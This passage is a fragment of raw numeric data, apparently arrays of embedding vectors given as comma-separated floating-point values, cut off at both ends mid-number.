049352795,-0.0031035398,-0.008809124,0.006904681,0.002074646,-0.005712506,0.039831806,-0.0122948615,0.0006317179,0.004137082,0.01790675,0.001789467,-0.0053151497,-0.008365526,0.012226709,0.005787392,-0.018494902,0.011700178,-0.013184555,0.009459981,0.019603552,0.03385316,0.04516712,0.015821392,0.016942028,0.002572816,0.007104246,-0.003986997,0.008596815,-0.0061479867,-0.048175715,-0.019066371,0.019731352,0.013124332,0.012481399,0.027942264,0.012507472,-0.0033922158,0.0027953975,0.013621436,-0.008902182,-0.010656209,-0.018005636,-0.008447858,0.0008746596,0.017822241,0.011974763,-0.0059645483,-0.0065666353,-0.003023275,0.008342176,0.019668251,-0.00039068007,0.0036917506,-0.025046818,0.021536257,-0.017472437,-0.02765956,-0.020311426,0.0056853155,-0.0021566148,0.018368043,-0.037409306,0.00746572,-0.002425498,0.0047508297,-0.012715964,-0.011219609,0.010252595,0.01058634,0.00088839454,-0.009204447,0.016783603,0.009612032,-0.007997451,0.00040964366,0.0034270422,-0.008109619,0.012228969,0.019152032,0.0072523146,-0.007095997,0.016696556,0.0017166473,-0.011475962,-0.010816297,-0.00085282145,-0.0138664255,0.024627214,-0.02155955,0.023933297,-0.00803229,-0.0074410774,0.0072031845,-0.004172862,-0.036656454,0.01611294,-0.009939105,-0.034865104,-0.0037045896,0.0051700957,-0.034440067,-0.010971643,-0.003267876,0.00042386245,0.013738376,-0.011464455,-0.02794613,-0.0053979545,0.010496538,0.006659431,-0.000266352,-0.022042098,-0.012658711,-0.0005810843,-0.016724369,-0.008045449,-0.03360475,0.00558541,0.0039693103,-0.011507435,-0.02318887,-0.014270088,-0.021557808,-0.02283891,-0.012321836,-0.0031887235,0.010905173,-0.02543091,-0.011511142,0.008273458,-0.01942383,-0.019925363,-0.03941447,-0.011123996,0.007854951,0.01957325,0.00746541,0.00696417,0.0001873147,-0.012291726,-0.0044455924,-0.0073259342,-0.037705634,-0.0022346477,0.025782298,-0.01667348,-0.019321624,-0.022981355,-0.0348459,0.035156682,-0.018538026,-0.007835407,-0.021269638,-0.0062480457,-0.021552214,0.032231193,-0.0011826499,0.0033074352,-0.019776274,0.0019929493,0.003388867,0.015514893,0.0020289023,-0.019209288,0.0108289905,-0.025093636,-0.0010080145,0.015280992,-0.01137918,-0.0027666187,-0.027501715,-0.008040929,-0.008612908,0.0068575833,-0.012360767,-0.005388493,-0.018664682,0.021213807,-0.005572593,-0.019391812,0.0008994834,-0.02906906,0.00498669,0.02141322,0.028556602,-0.0039008793,0.041434087,-0.051109914,-0.0055438424,0.019034956,-0.0061224145,-0.016111683,0.010507755,-0.011909324,-0.074548945,-0.027108083,0.02519432,-0.017891888,-0.018038351,-0.017478542,-0.0031499148,0.015590416,-0.034229867,-0.019224951,-0.0013440539,0.017726524,-0.012860797,0.01044007,0.008817075,-0.0020280033,0.0005924293,-0.0033341662,-0.018909091,-0.011358947,0.003241417,0.021780573,0.016889093,-0.013244788,0.0073569957,-0.02938054,-0.012176524,-0.010607167,0.002149171,0.007902703,0.011517898,-0.032249626,-0.03197059,-0.028198022,-0.005668094,-0.013769356,0.0025114769,0.0085918205,-0.019281149,0.016366744,0.0036035716,0.14321677,-0.0029339332,-0.0074225725,-0.018367214,-0.0074821804,-0.012321821,-0.0110470895,0.01741275,0.00094711914,0.0056318333,0.0058686463,-0.0021965862,-0.0050018393,0.0034011165,0.011860364,-0.014615291,0.015455598,0.15424515,0.003842366,0.01656024,0.02548287,-0.0069107017,0.027582878,0.015229635,0.0041675996,-0.064835295,-0.004297365,-0.02744063,0.014643081,0.0010302516,0.0016136137,0.020433018,0.003060883,0.0037552873,0.009864573,0.0008361138,-0.0026386215,-0.020704482,-0.013422718,0.0038646348,-0.0017980293,-0.0039023266,0.00027945748,0.007868046,-0.0019023779,0.010543612,0.01196068,0.006236486,0.019768504,0.034419533,0.02221081,-0.010087019,0.011005041,0.018078081,0.013992976,0.04386166,-0.010992759,0.0219301,-0.042735215,0.013621821,0.00987733,0.010893432,-0.018844489,0.005651387,-0.006704746,-0.015614431,-0.013422429,-0.008969052,-0.011137239,0.0056502987,-0.008794935,-0.010445892,-0.02441875,-0.029092062,0.034151185,0.0030596713,-0.018616723,-0.02387989,0.02023204,-0.00829098,0.022924617,-0.0021885692,-0.019795338,0.02258855,0.0040210206,-0.004592112,0.007533208,-0.006528016,0.014903476,-0.00445687,-0.02174667,0.0060086856,-0.00027348788,0.001430571,0.013605943,0.029650103,-0.012979554,0.0007818072,-0.003133667,-0.021250214,-0.01461669,0.022510847,-0.004024688,0.020783823,-0.009018684,0.0038219055,-0.012040042,0.013778298,0.0020388197,-0.0012425751,0.008524338,0.010293857,-0.0092211645,0.0118922945,-0.020649612,-0.0074819447,-0.008052981,0.010027248,-0.017909406,0.007978746,-0.002110613,-0.021873942,0.023520313,0.014265305,-0.030475497,-0.007019752,0.0020688402,-0.010963446,-0.04120326,-0.0056916624,-0.014972092,0.024071269,0.0057028304,0.029166002,0.008730788,-0.029465884,0.006598844,-0.018383171,-0.006469431,-0.0030838593,0.012101456,0.020706533,0.015023764,0.0018000992,0.006984319,0.008736027,0.0022835364,0.00017677082],[-0.0045217527,-0.010353449,0.00093981874,0.0022494325,-0.0003904093,-0.01832275,-0.024816267,0.018355185,0.011567113,0.0013259811,0.0022908086,0.027648408,-0.0055680745,0.004776956,-0.029185936,0.00504975,-0.0054045757,0.0016943167,0.034434315,-0.009158128,0.009048096,-0.009556736,-0.0042519793,-0.027991096,0.019574586,0.008995994,-0.006785718,-0.0056318357,-0.0016144904,-0.0032399725,0.013906025,0.027376672,-0.013039064,-0.018286768,-0.004458603,0.00022782611,0.0008397266,-0.01645658,0.0048489748,-0.0066907047,0.020239156,0.010907429,-0.020250097,0.00022798683,-0.027064601,-0.017599992,-0.017326681,-0.011207725,-0.017098201,0.004154467,-0.0037361796,0.0039574043,-0.025081053,0.021141728,-0.008343633,0.019541176,0.0035530934,-0.042157274,0.02579356,-0.005117537,-0.0062180907,0.019405972,-0.0037049442,-0.0030133422,0.042269643,-0.001911427,-0.02121142,0.0022101102,-0.030400435,-0.0056067845,0.019278428,-0.001239199,0.00002983919,-0.0064766877,-0.016887428,0.017344825,0.004828326,-0.0067869797,-0.013143975,-0.01265208,-0.029373206,0.011672243,0.020762622,-0.008042733,0.005320617,0.002638069,-0.0010791642,-0.0038402327,-0.013516529,0.0074026715,-0.011140035,-0.0034254182,-0.0053280964,0.010167881,0.01265818,0.005736944,0.017449621,-0.007728054,-0.0009898766,-0.0073681795,-0.016246043,0.005505338,-0.006612119,0.0066316784,0.00015689906,-0.01992193,-0.0028616535,0.02014907,0.0023023705,0.024289275,-0.017240845,0.024025623,0.013260905,0.009366928,-0.0035740074,-0.0058785602,0.011977054,0.012932053,-0.0028593633,0.008012098,-0.0004579767,0.024170142,0.018859623,0.0033374657,-0.028950054,-0.0073544565,0.014411988,0.0005989086,-0.00570972,-0.0008373838,-0.0051129116,0.014515286,0.0017481962,0.00038952686,-0.008303592,-0.006650503,-0.00064507674,-0.010227801,-0.0021884907,-0.022417797,0.017923156,0.00045788477,0.038926344,0.00796315,0.009041468,0.0051527503,0.0004117077,0.0102738915,0.030986521,0.014059992,0.022644568,0.0072513376,-0.0020915421,-0.02124426,-0.00048175754,0.0006802093,-0.007910123,-0.010521059,-0.004844773,0.0063501047,-0.000913704,0.0018730237,-0.013417429,0.010355266,-0.011708807,-0.021627966,-0.0026881574,0.0029541447,-0.0070225084,-0.017746916,0.0018290671,0.014924528,0.016282575,-0.0049303505,0.0013932025,-0.00768562,0.014724026,-0.016964285,-0.011767275,0.0037937425,-0.0074710157,0.008737252,0.020889446,-0.0077908677,-0.000120120116,0.032508064,-0.0042280233,0.018025167,-0.008818446,-0.010385619,-0.023479229,-0.022904845,-0.016818441,-0.004971514,-0.0107657155,-0.020951763,-0.0021969846,0.10987177,-0.011825519,-0.017252386,-0.011778606,0.0003986702,0.012597633,-0.0001607252,-0.006106801,-0.013851607,-0.020599822,-0.00022742369,0.013017617,-0.011115947,0.020874001,0.013471476,0.0105246045,0.00237928,0.035440534,-0.08967589,-0.0002792142,0.026972465,-0.037215307,0.007014425,0.006958078,-0.0060069533,0.0048597516,-0.011572138,-0.020705657,-0.004369084,0.03289909,-0.00045264332,0.009732756,-0.026912104,0.013289307,0.015584173,-0.036707114,-0.0323868,0.0014568362,-0.040327784,0.008301992,-0.00051253074,0.012282417,-0.004374733,0.0063322685,0.006243987,0.025053013,0.00806082,-0.019805498,0.0071031577,0.013921149,-0.0043161195,-0.00306403,0.0017115698,-0.005739116,0.0014085526,0.013609088,0.01867184,0.0010258374,-0.017309252,-0.015894746,0.0015617566,0.0066134194,0.015023428,0.007650798,0.040366296,-0.02010322,0.02223299,0.0227902,0.0010008817,0.008502042,-0.041515715,-0.007063316,-0.015122021,-0.05875459,0.014803129,0.0046287137,-0.023376582,0.0061310194,0.013496051,0.013774834,-0.003386777,0.024134714,-0.012691163,-0.007215881,-0.0003291198,-0.012657879,-0.032092135,-0.030194571,-0.0076715644,0.009370487,-0.001137456,0.030617896,-0.008147572,-0.03787582,0.016027827,0.023298489,0.0041713314,-0.0073836525,-0.007928862,-0.010637812,0.02189692,0.016089085,-0.012420234,-0.008940834,-0.018326316,0.02797937,0.008806317,-0.003417468,-0.013782241,0.004017283,0.017747976,0.0012357384,0.004540188,-0.016861323,-0.010068305,-0.008862829,0.0025396298,0.0115434555,0.012769694,0.01558594,-0.014378957,-0.0065015913,0.01156111,0.020403674,0.002898517,-0.012618331,-0.004675706,-0.00026172047,-0.0038481548,0.029913755,0.021512365,0.0066849417,0.005889872,0.019767562,-0.014429878,0.01603558,0.02729154,-0.017458862,0.014581503,0.005064039,0.0014269386,0.0015593269,0.02610659,-0.012827979,-0.00038151702,-0.0056368555,0.0017124962,0.010710419,0.014997767,0.007004268,-0.015407981,0.006015925,-0.0029778315,0.0069115176,0.0127495155,-0.026415374,-0.009001317,0.018897189,0.0037522595,-0.014326664,0.002606586,-0.011306294,-0.0035747292,0.015070437,-0.015989188,0.028813919,-0.014963355,0.06811763,0.0063344114,-0.0032728503,0.018603414,-0.016536016,-0.004720623,0.011212089,0.0014147969,0.01440902,0.0018990223,-0.0059961975,-0.012817245,-0.006869922,0.00453645,0.015614631,0.00076588505,-0.01132507,0.010585893,-0.035028346,-0.025999893,0.037395854,-0.014172914,-0.023796136,0.015702037,0.013975067,0.013295,-0.017565846,-0.0025564404,-0.010928869,-0.014860776,-0.013162105,-0.007076131,-0.0051950915,-0.008038084,-0.016474927,0.019087184,-0.000035153258,0.0067698853,-0.003813837,-0.0019312273,-0.016403556,0.0070138127,-0.013753206,0.01163593,-0.005597428,0.0138449995,0.024954468,0.015770236,-0.0036920728,-0.0061414475,0.010194071,0.007988897,-0.024518974,0.03401866,0.0037699905,-0.0053893975,0.019277135,-0.026398735,0.015360241,0.022836145,0.035517998,0.018875051,-0.0323111,-0.009345283,-0.0077009685,0.04206419,-0.009741549,0.0009656631,-0.0074508167,0.0010996121,0.0056006126,0.004892111,0.013378882,-0.001855326,-0.010205754,-0.0047782576,-0.01300262,-0.013309082,0.0026069449,-0.017506918,0.00074673624,-0.0074489466,-0.010516654,-0.0024791472,-0.015473569,-0.006121679,0.009059321,0.0070595806,0.011898799,-0.011212016,0.03741649,0.006636949,0.012283561,-0.010905954,0.014334454,-0.0032178469,0.017164007,-0.01618999,-0.006862112,0.03155141,-0.019289495,0.010972156,0.003517942,-0.016361382,0.006387892,-0.011294005,-0.016400076,-0.018929636,0.010560848,0.04077676,-0.010693413,-0.004442561,-0.004275539,0.010322867,0.016693633,-0.0076505076,-0.0067848195,-0.014403527,-0.00934389,0.011095052,0.023202922,0.0047774664,0.016688948,0.018050643,-0.013607348,0.019007623,0.0075041032,-0.0027797068,0.0011033124,0.021325028,0.00032898484,0.017717712,-0.0023839516,-0.040326674,-0.013584185,0.0050135185,0.0042233183,-0.02868923,0.022528898,0.005875274,0.011276179,0.013955969,-0.0029049513,0.00798978,0.01132664,0.011168285,0.020249858,-0.0028663413,0.022838749,-0.010170281,0.00029708855,-0.00992337,-0.0016571583,-0.0069240187,0.0056788367,0.0040743467,0.023939652,-0.01339664,-0.0025331704,-0.004211005,0.025514193,-0.01325931,0.005274104,-0.01850573,-0.013154181,0.0043732612,0.013479684,0.09676719,0.0012612343,-0.017145548,0.00018421462,0.013717753,0.016757848,-0.008439256,0.0065732677,-0.0379776,0.02230381,-0.0058102417,-0.0037119095,-0.0013438526,0.009844021,-0.01675288,-0.017224446,-0.016890386,-0.0141505785,0.016971834,0.0018742793,-0.007747017,0.006384463,-0.025718052,-0.029637849,-0.026645744,0.004996157,0.0033027232,0.027502872,0.00009820698,-0.0058373837,-0.019501315,0.001578939,-0.0036928721,0.000112438574,0.020053659,0.016783783,0.0012840179,-0.009055002,0.0055906833,0.04172588,0.009973435,-0.024846213,0.007103141,0.033248935,0.0149298515,-0.009950086,-0.019176196,0.017921748,0.017879512,-0.0025970591,-0.0145147145,0.016422698,0.018424537,-0.0053970157,-0.010833583,-0.011324275,0.011182762,0.018346306,-0.00059134874,0.0051469384,-0.0040663993,0.0133091975,-0.010237437,-0.0078175375,-0.0075311423,0.016113214,-0.0042553684,-0.019030634,-0.0026586284,-0.024382371,0.005334148,0.011312354,0.01345343,-0.0019695652,0.019213371,0.022969281,0.021163391,0.0204921,0.015178076,-0.01353494,0.011273119,0.00392674,-0.0031408384,-0.012187328,0.017428499,0.0075542494,-0.011763869,0.021383867,0.0036296078,-0.036873214,0.015541461,0.012487916,0.006970996,0.014744445,-0.011469311,0.00831421,-0.004535176,-0.0005519604,-0.00047500862,0.0053096144,-0.00051749946,-0.037866764,-0.023022205,0.028854817,-0.0047018463,0.011939345,0.0043321294,0.019021017,0.0203476,-0.010598409,0.0093076825,-0.057226304,0.013509834,0.021864558,0.022774592,-0.027570626,0.03326537,-0.029509375,0.015649471,-0.0018959204,0.004103717,-0.0023667328,0.007122565,-0.014778948,0.019113166,0.015419187,0.01797042,-0.023962887,-0.040187027,0.005175398,-0.04504233,0.019998277,0.039765894,0.0058534346,0.012320108,-0.005422219,0.015759809,-0.0116042625,0.0002519028,-0.010987281,-0.020917542,0.002898217,-0.0004465981,-0.0015849972,0.009928768,0.0128944265,0.0001869062,0.0043777134,0.0074755154,0.001124295,-0.014104179,0.022484582,-0.02784671,-0.017489335,0.0050739455,-0.02353072,0.017820055,-0.02865674,0.027227983,0.007813879,0.017418988,0.0030806437,0.0031278327,-0.006029441,0.009689009,0.016298221,0.0130494125,-0.002741956,0.0215214,-0.015486569,-0.008024345,-0.016682023,0.018407157,0.0073062633,0.008791829,-0.00015759267,0.013335552,0.015767189,0.007104299,-0.0060135904,0.01172991,0.004182275,0.019560955,0.012408557,0.012984864,0.017124329,0.005752294,0.013833806,0.013841113,0.00793544,-0.0017442052,0.015129043,-0.017890709,-0.018126799,0.028696747,0.022561133,-0.03180685,0.0077054896,-0.011953705,-0.009956959,-0.013099395,0.0013848185,-0.0013065635,-0.019017184,0.00029435902,-0.0059017725,-0.009620903,-0.018455612,-0.025345076,-0.012384167,0.01020385,0.038758006,-0.008925539,0.009434279,-0.010064883,-0.02169811,-0.011256555,-0.02461272,-0.023129106,-0.013042964,0.030056776,0.0112082735,0.02563002,0.00020593418,0.010307208,0.022277517,0.038455836,-0.007809303,0.0032848674,0.0002671117,-0.0069462326,0.005581063,0.025152951,-0.005025156,-0.015467481,-0.00008995858,0.0010784974,-0.012582546,-0.016298668,0.009742783,0.035492834,0.030890038,-0.0061643943,-0.018615028,0.008823808,0.0023503033,-0.0027262443,-0.0010007235,-0.027301699,-0.015183306,-0.010967433,0.004697247,-0.008603591,0.010869996,-0.012452987,0.025731143,0.02009279,0.0058257557,0.0019764341,-0.0028995266,0.006765441,0.013779788,0.017720472,-0.022829982,-0.015228698,-0.018106475,0.022676615,-0.01851514,0.011585965,-0.0035624115,-0.010309244,-0.021613665,-0.0031602145,0.010822346,-0.015436747,0.008711904,0.0030479732,-0.036864873,0.018132275,-0.0029934272,0.010689214,0.0019414228,0.024532273,-0.012004983,0.02197331,0.017250625,-0.018082393,-0.053351782,0.002682558,0.006101818,-0.022045894,-0.016283171,-0.027541438,-0.034761284,0.01461331,-0.01735718,0.027273376,0.014222064,-0.021339199,-0.009053907,0.00040347173,-0.00034059485,0.008753043,0.008290312,-0.030279424,-0.007680578,0.004284345,0.00046134822,0.02356445,0.011064926,-0.0058800243,0.042794876,-0.015118044,-0.02680415,0.014514418,0.0069427206,-0.009868481,-0.018014312,-0.0053889845,-0.009963067,0.0005146082,-0.006976017,-0.01922032,0.0020995806,0.0061756996,0.026836388,0.01156971,0.01600309,-0.0056218333,-0.021840261,-0.005895284,0.0013721223,-0.02200001,-0.00039204519,-0.001149498,0.0053199963,-0.010425312,0.007256666,0.017137978,0.013549825,0.012595813,-0.010228429,0.007129676,-0.013795035,-0.00027209174,-0.012932656,-0.028968854,-0.0030255807,-0.007596681,-0.006645257,0.010402789,0.010227623,0.013369306,0.002116548,0.006855406,0.014979121,-0.013061784,-0.0008008002,-0.014199708,-0.015057803,-0.017771663,0.017175077,-0.035539497,-0.0087071145,-0.013230954,0.0020226152,0.030689511,-0.020865768,-0.0138615435,-0.0005857796,-0.013261765,0.028932368,0.01205494,-0.00084594236,-0.016526248,0.031759538,0.0065995217,-0.0023389927,0.0066166567,-0.004848338,0.019947138,0.004112081,0.022408914,-0.005630715,0.019014142,-0.021478718,-0.00881574,-0.010980289,-0.020265507,0.0011531205,-0.0037242852,0.017026328,0.008853886,0.014916179,-0.01696906,0.022706853,-0.0094301,-0.011677353,0.003602229,-0.015479191,-0.0023579597,-0.015215202,0.009888166,0.011087859,-0.023575101,0.0139100915,0.010655851,-0.054547753,0.035801455,0.014516056,-0.011762175,0.005541981,0.024530536,0.013763582,-0.013046697,0.037904512,-0.010068521,0.011743604,-0.012927458,-0.020855218,-0.014257984,0.006809953,-0.0017491982,-0.033172768,0.014891661,0.0061236746,0.008259111,-0.017885309,0.0015275307,0.0042773476,-0.01816907,0.0014558807,-0.015854318,0.019054623,-0.02629211,-0.022681871,0.013698537,0.0060767485,0.00416547,-0.003582184,0.007997973,-0.016689261,-0.027687903,0.0034454858,0.0052845706,-0.01781574,-0.0013798455,-0.018670067,0.01780646,0.0012890691,0.027479082,-0.014858575,-0.015304798,-0.0068865316,-0.04763664,-0.016197024,-0.024201298,0.0112379305,-0.017250651,-0.017566001,0.025817154,0.000068041074,0.024753237,0.0057289745,0.0038987051,-0.011216232,-0.021843828,0.0020619652,0.00687673,0.0031533786,0.015076337,-0.02242006,-0.009768419,-0.0011896378,0.02347534,0.009466976,-0.00056445505,-0.0042770607,-0.00089456385,-0.01721245,0.0028470808,-0.013362796,0.02322915,0.0189239,-0.027224489,-0.0002852061,-0.011990691,0.0008715923,-0.006859529,-0.008733716,0.010392731,-0.01787781,0.00405444,-0.01873438,0.0004995618,0.0056987065,-0.024959292,0.0032446815,-0.024276316,-0.011679702,-0.0014912694,-0.0018453042,0.016116131,0.0077761873,0.023715373,0.011904881,-0.016753588,-0.00038693653,-0.00842303,0.0008432279,0.036064308,-0.0036114166,0.000560699,-0.00015956681,-0.01380204,0.031198258,0.009072354,0.0062479163,-0.003744783,-0.01480352,0.004776364,0.014163834,-0.008067766,-0.008525795,0.015827058,0.03285527,0.0063871774,-0.0100590745,-0.0106287645,0.0011661801,0.005684482,-0.013571805,-0.00132233,0.021519532,0.01277207,-0.02981346,0.013374189,-0.007503862,-0.0008996308,-0.01280576,0.0025992983,0.0016683035,-0.013486845,-0.012258866,0.0052596224,-0.018949311,0.0117182415,-0.008476173,-0.029969158,-0.03964754,0.009295948,-0.013780725,-0.0108496435,0.009137967,-0.0001707877,0.000021366995,0.0011714472,0.0035406013,-0.023976125,-0.0074135903,-0.02829744,-0.0012298141,0.011005028,-0.006958842,0.0077558975,-0.019555137,0.010476131,-0.018631157,-0.020659909,-0.0055780117,-0.008808657,-0.03086207,-0.005751361,-0.0063254363,0.008834521,-0.02394712,-0.00407377,0.008096109,-0.009377097,0.005335629,0.0014419463,0.030072423,-0.0060995277,0.015075849,0.011744498,-0.020610405,0.0006860653,0.0048667453,0.03545991,0.0078849755,0.016600959,0.011462065,-0.020840919,-0.018509604,-0.009498034,-0.01246525,-0.018918198,-0.021419773,0.013834777,-0.004787804,0.010045694,-0.009029949,0.001419126,0.009464381,0.030176654,-0.01422166,0.021664402,-0.021415502,0.02735447,-0.0022163994,0.008059659,-0.025517577,0.002802457,0.01731881,-0.010966544,-0.0011997963,-0.013843876,-0.003540619,0.0050370516,-0.018151734,0.008156333,0.008880187,-0.000988876,-0.0051500015,0.026158324,0.012631849,-0.025132142,0.028036924,0.012289962,0.010220196,0.0031656153,0.0013028337,-0.024151547,0.008724914,-0.009947707,0.009475941,0.0137853855,0.0013265773,-0.030771388,0.005147761,0.009868726,-0.010629209,0.014798237,-0.0095885545,0.0028825202,-0.01651709,-0.027691675,0.007580522,0.0056275926,0.002316829,-0.009796192,0.0011649944,0.035332583,-0.0028482482,-0.0038981452,0.012333167,-0.02456133,-0.0012083881,-0.0036337867,-0.0031124367,-0.027609492,-0.019621095,-0.003459728,-0.0032779642,-0.023134284,-0.0039679795,-0.012163225,0.0037211566,-0.01715611,0.0010068861,0.008195498,0.01955816,0.0006355378,0.01476569,-0.009714319,0.012254141,-0.011778943,-0.0031922625,0.007595847,0.009611612,-0.0024812673,0.008284163,-0.008840157,-0.023872035,0.0010697375,0.015334399,0.0022719277,0.00055482704,-0.0128062675,0.016323576,-0.020468041,0.008836159,0.018718174,0.004507878,-0.031688076,0.017711157,-0.011662392,0.002704287,-0.005728551,0.00026022637,0.010133254,0.025475211,-0.0122687835,0.007949308,-0.012372437,0.021728894,-0.01789597,0.04869002,0.0014568411,0.0021846034,-0.01228381,-0.0017944679,-0.021268768,0.0126180975,0.001812032,-0.006587608,0.0094556045,-0.020172652,-0.02090845,0.023641909,-0.02833278,0.029292082,-0.00014927056,-0.0057407706,0.014446919,-0.021577524,0.023182096,0.0090432875,-0.0060896813,0.0017485669,0.003201502,-0.0057895393,0.03350644,0.013224211,0.015709084,-0.026589071,0.007336977,-0.0035445662,-0.007766347,0.0027597477,0.01721385,-0.017679315,0.014320425,0.0077108224,-0.023307584,-0.00022569083,0.010485852,0.004582716,-0.019009918,0.07796332,0.008556855,0.002581369,-0.011664743,-0.022961868,0.018646175,0.015665563,-0.013262248,0.023036484,0.009771441,-0.001887431,0.0077261124,0.00032298613,0.016695403,-0.009245113,0.02717472,0.016780108,0.008690406,0.012965334,-0.0020740246,-0.016766995,0.008881785,-0.014938448,-0.01663611,-0.009055896,-0.00904779,-0.00014605596,-0.023712285,-0.01291203,0.0009317522,0.0029136809,-0.023411518,0.0038320455,0.010660117,0.02363333,-0.026977923,-0.0049369815,0.01345407,-0.0010514907,-0.03750326,0.034326028,-0.008390656,0.0037825424,-0.0062606917,0.007241196,-0.014394617,0.082723506,0.035514265,0.031119958,-0.03489056,0.01264711,0.033307713,-0.02443869,0.01598906,0.017343292,0.0072620446,0.00185836,0.030924655,-0.019692348,0.002470016,0.008782534,-0.0026588747,-0.020975025,0.017265137,-0.0018038341,-0.025089096,-0.025520118,0.023160208,0.01712314,-0.015743837,0.0010234433,0.02608291,0.010167098,0.015537124,0.016900644,-0.025234515,-0.012054139,0.000022459655,0.019054566,0.008536695,0.022677446,-0.05178069,0.0038082604,0.1818339,-0.012796588,0.0056544994,0.014508561,-0.008507359,-0.0031994972,-0.09178159,0.0072044632,0.0042779115,0.0016237849,-0.012734471,-0.033205025,-0.012680588,0.014151579,0.017005196,0.028826611,0.021359866,-0.03583932,-0.0023679705,-0.018348277,0.00923291,0.015578779,0.012520453,-0.0071555558,-0.0113351,-0.011703715,0.017110066,-0.01395162,-0.012712681,0.00131694,0.007899051,-0.004752119,0.017373905,0.011979252,-0.016194561,0.01276803,0.009078963,0.006673179,-0.0011036836,-0.017101904,0.011103249,0.0013263538,-0.012302146,-0.021015055,-0.17544685,-0.011579053,0.034615684,-0.017274417,0.0013575209,-0.009146633,0.02228792,-0.014939348,-0.0013658804,-0.024271935,0.0018623003,-0.0002486829,0.013832928,-0.0017715435,0.0048613762,-0.013296644,-0.0011166383,0.006677585,0.010135558,0.0073970924,0.02690073,0.013649474,-0.02507868,-0.018016435,0.013757305,-0.003441639,-0.023694225,0.012923359,-0.012227799,0.019116294,-0.013888265,0.019819995,0.009448922,0.018739913,-0.032865547,-0.020111091,0.0039622975,0.00024136601,-0.029277649,0.00048405438,0.014674253,-0.011922445,0.007983225,-0.0042882417,-0.0010477537,0.0271263,0.007927939,-0.008265214,-0.00025344457,0.00006371525,0.012747376,0.02318681,-0.034160927,0.011885172,-0.0060394714,-0.013024885,-0.010834456,-0.02688646,-0.01912459,0.00587912,-0.005589498,-0.017245231,-0.035382878,-0.020182991,0.022415716,-0.021430068,-0.0062477747,-0.015573258,-0.0038113014,-0.0031997375,-0.0029270668,0.0072668777,0.010048384,-0.023715552,0.01941507,0.024461702,-0.020122796,0.0043793228,0.020490015,-0.009853673,-0.017749391,-0.016723603,0.01106643,-0.0066219284,-0.01716135,-0.0027965445,-0.020489072,-0.014471403,-0.0002519357,0.011462747,0.00015291889,0.01676364,0.021908503,0.0029924745,-0.017078394,0.0013237706,0.0381595,0.025552375,-0.023781663,0.03371737,-0.0029431714,-0.016018713,-0.02039727,-0.012552393,-0.009088637,0.010329968,0.004124675,-0.011485125,-0.016591711,-0.008503843,0.0034445003,0.00033182235,0.01527747,-0.02831254,-0.02478585,-0.012011508,-0.0036400785,0.014690404,0.021212852,-0.014257758,-0.037910074,0.0056056143,-0.016969508,0.0094842985,0.030593507,-0.0051258476,-0.031578384,0.0022166104,-0.011511274,-0.030121438,-0.013251495,0.008555776,-0.008116322,0.009660455,0.014495716,0.01731657,-0.018544905,-0.017228132,-0.009374638,0.01603619,0.0075860056,-0.02127742,0.005839356,-0.01573697,0.013634446,-0.02373255,0.024845343,-0.017144328,0.0032250914,-0.028153483,0.0073161474,0.03842101,-0.0058397893,-0.02254683,-0.0056514586,0.10289758,-0.0073763374,-0.018437468,0.0005470282,-0.007608711,-0.0043998556,0.017080225,-0.02802554,-0.0050371774,-0.028971579,-0.044145014,-0.0051590726,-0.0040592887,0.009910906,-0.020911738,0.02651558,0.016639918,0.005314009,-0.016864888,0.00040890335,0.009790603,-0.005319788,-0.003993269,0.047000065,0.025620168,-0.012374475,0.004131804,-0.007244234,-0.0073609245,0.007318446,-0.015421249,0.0006254952,0.0020589207,-0.014897039,0.012231217,-0.041762147,-0.009319742,-0.0062931865,0.003592871,-0.018308444,0.0035729974,-0.0012223258,0.0101802675,-0.011089997,-0.00028107193,0.017309137,-0.0042210096,0.018476304,-0.0038817998,-0.008225495,-0.0051311958,0.0066491077,0.003228224,-0.026846416,0.011809235,-0.033662923,0.0068567935,-0.0024374868,-0.020426547,-0.0106858285,0.035912577,-0.009409727,0.004652912,0.010103546,-0.009197155,0.007198158,-0.010987908,-0.003322263,0.0017864119,0.03238607,-0.004252785,0.012816735,0.0003849145,0.020655826,-0.017440919,-0.0013003328,-0.015252776,-0.010551066,-0.017388683,0.010384223,0.0067598023,-0.005229053,-0.027914902,0.0052211657,0.0016471553,-0.07355079,0.001291861,0.0059562884,0.00039215822,0.012822313,0.011690816,0.023037596,0.055113196,0.012150504,0.021374203,-0.00003717339,0.004843366,-0.0016411644,-0.017150093,-0.0076839533,0.008368268,0.021581167,0.0021494692,0.0029707146,-0.010531474,-0.022440715,0.016509484,-0.018480364,-0.0025357287,-0.020403301,-0.009352261,-0.022463676,0.009179195,-0.003627624,0.005952201,0.034599792,-0.021549577,-0.009781087,0.01422624,-0.015900249,-0.026972027,-0.024293207,-0.0036914859,-0.000023814362,0.020038705,-0.0016927972,-0.027745008,0.021514472,-0.01596184,0.006786925,0.00044695204,0.021082737,-0.0040211175,0.022988025,0.0008845745,0.0019047703,0.016686928,0.011503188,0.015362899,0.011768156,-0.019411525,0.014869454,-0.004338475,-0.010138861,-0.010487156,-0.0059526223,-0.0008265251,-0.014239701,-0.029079737,0.0135192815,0.00045664608,0.0033533673,-0.0031007936,0.0045884205,0.007548883,0.011282159,-0.014967388,0.00989507,0.007404963,-0.0024827344,-0.018813888,0.02460594,0.010463484,0.0032065804,-0.002143844,0.011412137,0.013066764,-0.0070038927,0.024854565,0.0009638414,-0.031320624,-0.025212517,0.0134738805,0.010729352,-0.010890821,0.017010191,0.016075782,-0.01162773,-0.014084457,0.013359342,0.028568713,0.018926986,-0.024195647,0.013554837,0.013945117,-0.018097164,-0.0027442416,0.019991012,-0.0045389626,0.0021488972,-0.0009812085,-0.004526248,0.0035990146,-0.029094469,-0.007494471,-0.0012902421,0.021944717,-0.01626342,-0.00020626438,0.002910044,-0.0015639847,0.04125322,-0.013973457,0.00039171558,0.012004103,-0.0031713406,-0.004568967,0.01788794,-0.014710313,0.019636538,-0.025859956,0.0038057847,-0.016813759,-0.019774862,-0.010804943,-0.0135208955,0.0032686682,0.014187177,0.004779645,-0.01724842,-0.00762887,0.011294229,0.005252451,0.0037575255,-0.039203882,-0.008139974,-0.026435137,0.073146775,-0.014566081,-0.0043553053,0.004131564,0.04637585,0.022837583,-0.01950813,0.0005516786,-0.029353172,-0.019484308,-0.008462811,-0.036157627,0.00095464,-0.00014386329,-0.009300182,-0.011786842,0.010839765,0.0055508944,-0.020451097,0.0062595583,-0.0018402529,-0.0071738088,0.000048437458,-0.005772203,-0.014537653,-0.029044015,-0.0064538866,0.00083591044,-0.029814886,0.0028716587,-0.016479338,-0.027143126,-0.026401171,-0.010279174,-0.00394626,-0.0067334394,-0.0013600616,0.016953275,-